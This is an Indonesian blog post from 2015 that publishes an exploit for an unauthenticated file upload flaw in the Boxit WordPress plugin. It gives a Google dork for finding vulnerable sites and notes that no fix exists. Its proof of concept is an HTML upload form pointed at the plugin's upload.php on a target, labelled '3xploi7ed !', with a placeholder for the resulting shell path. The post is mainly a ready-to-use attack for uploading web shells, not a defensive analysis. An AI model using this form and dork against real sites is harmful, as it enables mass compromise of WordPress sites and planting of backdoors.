Halaman

Wordpress Boxit Plugins File Upload Vulnerability

Sabtu, 26 Desember 2015

#- Title: Wordpress Boxit Plugins File Upload Vulnerability
#- Author: Asep Jablay
#- Date: 26/12/15
#- Developer : boxit.sd-dev .com
#- Link Download : codecanyon .net/item/boxit-the-dropbox-file-upload-for-wordpress/4425955
#- Google Dork: inurl:"/plugins/boxit/"
#- Fixed in Version : -
#- Tested on : Windows 
==================================================
-- Proof Of Concept --

When Vuln:
{"jsonrpc" : "2.0", "result" : "ok"} 

CSRF :

<formaction="http://target/wp-content/plugins/boxit/upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

Shell PathHere

Tidak ada komentar:

Posting Komentar